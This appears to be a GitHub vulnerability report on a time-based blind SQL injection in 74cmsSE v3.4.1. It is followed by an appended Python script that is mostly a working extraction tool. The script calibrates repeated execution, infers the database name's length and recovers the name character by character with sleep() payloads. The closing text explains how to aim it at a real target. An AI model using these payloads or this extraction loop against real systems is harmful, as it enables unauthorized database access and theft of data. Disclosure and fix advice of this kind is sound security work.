SQL Injection vulnerability #8

PAINCLOWN opened this issue Jun 9, 2022 · 0 comments
@PAINCLOWN PAINCLOWN commented Jun 9, 2022

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version: 74cmsSE_v3.4.1
Download link
Vulnerability Description:
74cmsSE_v3.4.1 has a time-based blind SQL injection that allows an attacker to run malicious SQL statements on the database, which can be exploited to execute illegal SQL commands and obtain sensitive database data.


In the path
$key is not strictly filtered, resulting in SQL injection.


As you can see from the figure above, the sleep() function is executed, so there is a time-based blind SQL injection.
With the test payload above, it is possible that the sleep() function is executed twice.
Time-based blind injection makes it possible to guess the length of the database name:


As shown in the following figure, we know through the arbitrary file read vulnerability that the database name of the website is "hsjp", and the delay is exactly double the length of database(), so the injection is successful.

It's a time-based SQL injection
Suggest: Add a filter function to this parameter
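Added example, not from the issue above and not 74cms code: a Python sketch of the timing inference the report describes. The issue's two observations (sleep() seemingly running twice, and a delay equal to twice the length of database()) become a calibration step and a length test; a third function goes one step further than the report and recovers the name character by character with if()/substr(). The target is replaced by `simulated_backend`, a hypothetical stand-in that concatenates the injectable value into an assumed `job` query and returns the delay MySQL would have added instead of actually sleeping, so the whole thing runs offline. `SIMULATED_DB_NAME` is set to "hsjp" because that is the name the report gives; the query shape, table name and payload text are assumptions.

```python
import re
from typing import Callable, Tuple

# Constructed stand-in for the target's database name; the issue reports "hsjp".
SIMULATED_DB_NAME = "hsjp"

# The three payload shapes the probe sends, in MySQL syntax.
_SLEEP_LEN = re.compile(r"sleep\(length\(database\(\)\)\)", re.I)
_SLEEP_N = re.compile(r"sleep\((\d+)\)", re.I)
_IF_CHAR = re.compile(
    r"if\(substr\(database\(\),(\d+),1\)='(.)',sleep\((\d+)\),0\)", re.I
)


def simulated_backend(key: str, executions: int = 2) -> float:
    """Hypothetical stand-in for the vulnerable handler (not 74cms code).

    $key is concatenated into the statement unfiltered, and the statement
    runs `executions` times (the issue suspects sleep() fired twice).  Rather
    than sleeping, it returns the total delay MySQL would have added, in
    seconds, so the probe logic below can be exercised offline.
    """
    sql = f"select * from job where title like '%{key}%'"  # assumed query shape
    delay = 0.0
    # if(substr(database(),p,1)='c',sleep(n),0): sleeps only when the guess is right
    for m in _IF_CHAR.finditer(sql):
        pos, ch, secs = int(m.group(1)), m.group(2), int(m.group(3))
        if SIMULATED_DB_NAME[pos - 1:pos] == ch:
            delay += secs
    rest = _IF_CHAR.sub("", sql)  # drop if() terms so their sleep(n) is not counted again
    # sleep(length(database())): one second per character of the database name
    delay += len(SIMULATED_DB_NAME) * len(_SLEEP_LEN.findall(rest))
    rest = _SLEEP_LEN.sub("", rest)
    # bare sleep(n)
    delay += sum(int(n) for n in _SLEEP_N.findall(rest))
    return delay * executions


def time_probe(send: Callable[[str], float], key: str) -> float:
    """Submit one value of the injectable parameter and return the delay it
    caused.  Against a live target this would wrap the HTTP request and time it
    with time.perf_counter(); here `send` is the simulator above."""
    return send(key)


def calibrate_executions(send: Callable[[str], float], baseline: float) -> int:
    """sleep(1) costs one second per execution of the statement, so the extra
    delay over baseline reveals how many times the injected query runs (the
    issue observed two)."""
    return round(time_probe(send, "' and sleep(1)#") - baseline)


def infer_db_name_length(send: Callable[[str], float]) -> Tuple[int, int]:
    """The issue's length test: the delay from sleep(length(database()))
    divided by the execution count is the length of the database name."""
    baseline = time_probe(send, "test")
    executions = calibrate_executions(send, baseline)
    observed = time_probe(send, "' and sleep(length(database()))#") - baseline
    return round(observed / executions), executions


def infer_db_name(send: Callable[[str], float], length: int, executions: int,
                  alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789_") -> str:
    """One step past the issue: recover the name itself, one position at a
    time, by sleeping only when the guessed character matches."""
    baseline = time_probe(send, "test")
    name = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = f"' and if(substr(database(),{pos},1)='{ch}',sleep(2),0)#"
            if time_probe(send, payload) - baseline >= 2 * executions:
                name += ch
                break
        else:
            name += "?"  # no candidate matched; widen the alphabet
    return name


if __name__ == "__main__":
    length, runs = infer_db_name_length(simulated_backend)
    print(f"database() length {length}, statement executed {runs}x")
    print("database() =", infer_db_name(simulated_backend, length, runs))
```

Against a real target, replace `simulated_backend` with a function that sends the request and returns its elapsed time, and lower the `>= 2 * executions` threshold to tolerate network jitter (or repeat each probe and take the median). The calibration step matters: without it a doubled execution makes every length guess come out twice too large, which is exactly the "double the length" effect the report describes. On the fix side, a blocklist filter on $key is fragile; binding the value as a query parameter removes the injection regardless of the characters it contains.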
